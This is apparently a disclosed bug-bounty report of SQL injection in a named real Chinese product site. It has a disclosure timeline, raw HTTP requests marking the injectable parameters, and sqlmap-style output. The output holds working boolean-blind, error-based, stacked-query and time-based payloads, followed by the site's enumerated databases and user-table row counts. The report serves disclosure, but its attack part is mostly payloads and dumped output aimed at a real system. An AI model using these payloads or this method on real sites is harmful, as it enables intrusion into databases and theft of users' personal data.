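2015-06-24: Details reported to the vendor; awaiting vendor response
2015-06-25: Vendor confirmed; details disclosed to the vendor only
2015-07-05: Details disclosed to core white hats and experts in related fields
2015-07-15: Details disclosed to regular white hats
2015-07-25: Details disclosed to trainee white hats
2015-08-09: Details disclosed to the public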
233
First visit to the thatched cottage:

GET /index.php?brand_id=342&page=1&pro_shoe_flat=*&r=product/shoe HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: yongpin.xgo.com.cn
Cookie:
Host: yongpin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*

Second visit to the thatched cottage:

GET /index.php?brand_id=342&page=1&pro_shoe_size=*&r=product/shoe HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: yongpin.xgo.com.cn
Cookie:
Host: yongpin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*

Third visit to the thatched cottage:

GET /index.php?brand_id=342&page=1&pro_shoe_width=*&r=product/shoe HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: yongpin.xgo.com.cn
Cookie:
Host: yongpin.xgo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
---
Parameter: pro_shoe_size (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: brand_id=342&page=1&pro_shoe_size=-8646') OR 1145=1145 AND ('qSaI'='qSaI&r=product/shoe

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: brand_id=342&page=1&pro_shoe_size=1') AND (SELECT 3333 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(3333=3333,1))),0x7171717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('axIY'='axIY&r=product/shoe

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query - comment)
    Payload: brand_id=342&page=1&pro_shoe_size=1');SELECT BENCHMARK(5000000,MD5(0x4b6a7464))#&r=product/shoe

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: brand_id=342&page=1&pro_shoe_size=1') OR SLEEP(5) AND ('CxzS'='CxzS&r=product/shoe
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user: '[email protected]'
available databases [20]:
[*] information_schema
[*] test
[*] xgo_active
[*] xgo_bbs
[*] xgo_bbs_admin
[*] xgo_bbs_troop
[*] xgo_comment
[*] xgo_picture
[*] xgo_plugin
[*] xgo_product
[*] xgo_product_stat
[*] xgo_review
[*] xgo_stat_hits
[*] xgo_tips
[*] xgo_tips_admin
[*] xgo_topic
[*] xgo_tuan
[*] xgo_user
[*] xgo_yongpin
[*] xgo_zhuqu

Database: xgo_user
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| user_relations            | 6387728 |
| userinfo                  | 1707478 |
| user_active_log           | 1595044 |
| user_checkimg             | 921394  |
| user_album_pic            | 876639  |
| user_check_mobile_code    | 875492  |
| user_message_2011         | 413961  |
| user_message_2014         | 394551  |
| user_online               | 321710  |
| user_real                 | 309146  |
| user_extend               | 309134  |
| user_mail_set             | 309052  |
| user_message_2013         | 255437  |
| user_album_info           | 230297  |
| user_score                | 207002  |
| user_message              | 167525  |
| user_register_log         | 163113  |
| user_message_2012         | 156266  |
| user_oltime_2011          | 125514  |
| user_oltime_2013          | 125226  |
| userinfo_test             | 123526  |
| userinfo_new              | 111228  |
| user_visitor              | 100592  |
| user_oltime_2012          | 93920   |
| user_oltime_2014          | 88678   |
| user_check_mail_code      | 62122   |
| user_oltime_2015          | 55335   |
| x_invite_code             | 39950   |
| z_login_api               | 35261   |
| z_api_token               | 16330   |
| tag_from_pic              | 5881    |
| tag_from_user             | 5881    |
| x_log_login_2013          | 4974    |
| x_user_score              | 4950    |
| x_userinfo_extend         | 4950    |
| audit_log                 | 4824    |
| x_check_mail_code         | 4612    |
| user_car_list_product_rel | 4493    |
| user_comments             | 3538    |
| x_log_send_mail_2013      | 3012    |
| user_tag2                 | 2717    |
| x_register_history        | 2608    |
| user_album_pic_tags       | 2538    |
| china_city                | 2489    |
| user_carport              | 2352    |
| x_user_car                | 1397    |
| x_log_login_2015          | 1200    |
| user_book_collection      | 1132    |
| x_log_login_2014          | 1101    |
| user_interest_doc0        | 1080    |
| x_log_send_mail_2014      | 1080    |
| whitelistuser             | 1043    |
| x_log_modify_pwd_2013     | 989     |
| user_obj_comments         | 974     |
| x_check_mobile_code       | 947     |
| tag                       | 890     |
| user_car_list             | 814     |
| user_tag_num              | 768     |
| x_register                | 751     |
| x_log_send_mail_2015      | 613     |
| checkimg_group            | 601     |
| china_town                | 580     |
| gift_present              | 425     |
| tag_user1                 | 382     |
| tag_user8                 | 351     |
| tag_user9                 | 342     |
| x_oauth_bind              | 337     |
| user_owner_info           | 336     |
| tag_user7                 | 330     |
| tag_user3                 | 316     |
| user_hide                 | 312     |
| x_log_modify_pwd_2014     | 292     |
| tag_user5                 | 287     |
| z_login_api_bark          | 279     |
| tag_user6                 | 274     |
| tag_user4                 | 239     |
| gift_buy                  | 235     |
| tag_user2                 | 227     |
| user_interest_doc17       | 144     |
| x_log_modify_pwd_2015     | 132     |
| user_car_list_vote_1      | 87      |
| china_province            | 35      |
| gift                      | 32      |
| user_tag1                 | 31      |
| user_active_cate          | 30      |
| xgo_qq_session            | 21      |
| user_rank                 | 9       |
| gift_sort                 | 6       |
| user_modify_pw_log        | 5       |
| user_interest_doc18       | 2       |
| x_user_verify             | 2       |
+---------------------------+---------+
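Take a look at the impact and judge in good conscience. Requesting rank 20!
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-06-25 10:28
Thanks, a fix is already in progress.
None yet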